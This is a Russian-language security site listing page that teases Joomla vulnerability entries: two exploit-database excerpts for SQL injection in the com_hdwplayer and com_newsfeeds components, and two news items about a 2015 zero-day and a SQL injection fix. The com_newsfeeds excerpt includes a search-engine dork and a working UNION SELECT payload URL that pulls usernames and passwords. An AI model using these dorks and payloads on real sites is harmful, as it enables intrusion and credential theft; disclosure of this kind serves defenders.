Поиск по сайту
Форумы 
Реклама
|
Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection # Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
# Dork: inurl:"index.php?option=com_hdwplayer"
# Date: 2020-03-23
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.hdwplayer.com/
# Software Link: https://www.hdwplayer.com/download/
# Version: 4.2
# Tested on: Debian/Nginx/Joomla! 3.9.11
##########################################################################
#Vulnerability details
##########################################################################
File: components/com_hdwplayer/models/search... Web apps // 25.03.2020 // Просмотров: 5003 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection # Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
# Date: 2020-03-10
# Author: Milad Karimi
# Software Link:
# Version:
# Category : webapps
# Tested on: windows 10 , firefox
# CVE : CWE-89
# Dork: inurl:index.php?option=com_newsfeeds
index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
Example:
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15... Web apps // 14.03.2020 // Просмотров: 1696 // Рейтинг: - // Комментариев: -
«-----------------------------------»
В CMS Joomla обнаружена критическая 0-day уязвимостьВо вторник 14 декабря команда разработки Joomla выпустила срочное обновление безопасности, закрывающее 0-day уязвимость, которая открывает злоумышленникам возможность удаленного исполнения кода. Хакеры уже активно пытаются атаковать уязвимые сайты. Что случилось По сообщению ИБ-компании Sucuri, эта ошибка уже эксплуатируется киберпреступниками — исследователям удалось обнаружить свидетельства успешных попыток ее использования еще 12 декабря. В лог-файлах веб-серверов скомпрометированных сайтов присутствовали... Уязвимости // 16.12.2015 // Просмотров: 19678 // Рейтинг: - // Комментариев: 2
«-----------------------------------»
В Joomla исправили баг, который ставил под угрозу безопасность миллионов сайтовМиллионы сайтов, работающих на CMS Joomla, могут быть взломаны, причем злоумышленник получает административный доступ к взломанному сайту. Это — следствие уязвимости в Joomla, которую исправили только на прошлой неделе (само собой, далеко не все сайты обновились, с тем, чтобы получить это исправление бага). Под управлением Joomla сейчас работает около 2,8 миллионов сайтов. Уязвимость, связанная с SQL-инъекцией, была исправлена на прошлой неделе, с выходом новой версии Joomla 3.4.5. Уязвимость позволяла... Уязвимости // 26.10.2015 // Просмотров: 2608 // Рейтинг: - // Комментариев: -
«-----------------------------------»
|
Разместить рекламу 
